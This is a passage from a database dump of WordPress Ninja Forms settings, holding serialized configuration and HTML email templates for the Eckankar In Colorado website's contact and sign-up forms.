left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_278\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_278\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:319;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:44\";s:5:\"label\";s:9:\"Save Form\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:137;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"0\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:44\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_270}\";s:13:\"email_subject\";s:41:\"Eckankar Colorado Springs - Communication\";s:13:\"email_message\";s:865:\"<p></p><p> </p><h2 style=\"color:#23507d;\"><span style=\"font-weight: normal;\"><b>ECKANKAR IN COLORADO SPRINGS</b> </span></h2><h4>You have created a new form submission on the Eckankar In Colorado website. We will be getting in touch soon!<br></h4><p>Here is a copy of the information you have submitted:</p>  <hr>    <p> First Name:&nbsp; {field:textbox_268}</p><p>Last Name:&nbsp; {field:lastname_269}</p><p>Email:&nbsp; {field:email_270}</p><p>Phone:&nbsp; {field:phone_1599585699152}</p><p>Message Subject:&nbsp; {field:textbox_303}</p><p>Message:&nbsp; {field:please_enter_your_message_here_1599585729237}<br></p>  <hr>    <p>If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Utah webmaster: webmaster@eckankar-utah.org</p><p class=\"\"><em>The Eckankar in Utah Team</em><br>https://www.eckankar-utah.org</p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:138;}i:2;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:44\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:360:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:139;}i:3;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:44\";s:5:\"label\";s:11:\"Admin Email\";s:19:\"email_message_plain\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:33:\"Eckankar In Colorado Contact Form\";s:12:\"from_address\";s:29:\"contact@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:44:\"Colorado Springs Area - Form Record Received\";s:13:\"email_message\";s:1743:\"<div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><h1 style=\"color: #23507d;\"><u>ECKANKAR IN COLORADO SPRINGS</u></h1><h3>You Have A New Web Contact Form Submission. <br>This form was generated by a user on the Eckankar In Colorado website.</h3><h3>Here is a copy of the information submitted by {field:textbox_268}</h3></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\" style=\"background-color: #eeeeee;\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p>&nbsp;</p><p class=\"\" style=\"font-size: 17px;\"><b>First Name:</b>&nbsp; {field:textbox_268}</p><p class=\"\" style=\"font-size: 17px;\"><b>Last Name:</b>&nbsp; {field:lastname_269}</p><p class=\"\" style=\"font-size: 17px;\"><b>Email:&nbsp;</b> {field:email_270}</p><p class=\"\" style=\"font-size: 17px;\"><b>Phone:</b>&nbsp; {field:phone_1599585699152}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message Subject:</b>&nbsp; {field:textbox_303}</p><p class=\"\" style=\"font-size: 17px;\"><b>Message:&nbsp;</b> {field:please_enter_your_message_here_1599585729237}</p><p>&nbsp;</p></div></div></div></div><div class=\"row bg-editor-hr-wrap\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><hr></div></div><div class=\"boldgrid-section\"><div class=\"container\"><div class=\"row\"><div class=\"col-md-12 col-xs-12 col-sm-12\"><p class=\"\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br>The Eckankar in Colorado Team<br>https://www.eckankar-colorado.org</p><p>&nbsp;</p><p>&nbsp;</p></div></div></div></div>\";s:14:\"drawerDisabled\";s:0:\"\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";}s:2:\"id\";i:140;}}s:8:\"settings\";a:41:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:34:\"Colorado Springs Area Contact Form\";s:10:\"created_at\";s:19:\"2019-07-15 14:05:48\";s:10:\"form_title\";s:33:\"Eckankar In Colorado Contact Form\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2016-03-03 03:15:50\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:2:\"36\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:9:{i:0;s:11:\"textbox_268\";i:1;s:12:\"lastname_269\";i:2;s:19:\"phone_1599585699152\";i:3;s:9:\"email_270\";i:4;s:11:\"textbox_303\";i:5;s:44:\"please_enter_your_message_here_1599585729237\";i:6;s:8:\"html_305\";i:7;s:18:\"html_1663797829803\";i:8;s:10:\"submit_278\";}s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(38,'a:7:{s:2:\"id\";i:38;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:9:{i:0;a:2:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"0\";s:11:\"idAttribute\";s:2:\"id\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_267\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:229:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado Contact Form</span></span></span></strong></span></h3>\r\nPlease Enter Your Information Below\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:158:\"<h3><span style=\"color: #23507d;\"><strong>Eckankar in Colorado<br>Book Discussion Sign-up<br></strong></span></h3>  <p>Please Enter Your Information Below</p>\";s:3:\"key\";s:8:\"html_267\";}s:2:\"id\";i:352;}i:1;a:2:{s:8:\"settings\";a:52:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"1\";s:11:\"idAttribute\";s:2:\"id\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_268\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_268\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:353;}i:2;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"2\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_269\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_269\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:354;}i:3;a:2:{s:8:\"settings\";a:49:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"3\";s:11:\"idAttribute\";s:2:\"id\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:4:\"type\";s:5:\"email\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_270\";s:11:\"field_label\";s:5:\"Email\";s:3:\"key\";s:9:\"email_270\";s:8:\"required\";s:1:\"1\";s:13:\"element_class\";s:0:\"\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:355;}i:4;a:2:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"4\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:6:\"hr_273\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:6:\"hr_273\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:356;}i:5;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"5\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:15:\"Message Subject\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_303\";s:11:\"field_label\";s:15:\"Message Subject\";s:9:\"field_key\";s:11:\"textbox_303\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:357;}i:6;a:2:{s:8:\"settings\";a:35:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"6\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_276\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_276\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:358;}i:7;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"7\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:147:\"Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:147:\"Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.\";s:3:\"key\";s:8:\"html_305\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_305\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:359;}i:8;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"9\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_278\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_278\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:361;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2020-12-08 15:42:53\";s:5:\"label\";s:9:\"Save Form\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:149;}i:1;a:2:{s:8:\"settings\";a:27:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"0\";s:10:\"created_at\";s:19:\"2020-12-08 15:42:53\";s:5:\"label\";s:17:\"Send copy to user\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_270}\";s:13:\"email_subject\";s:38:\"Western Slope Leadership Communication\";s:13:\"email_message\";s:4984:\"<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                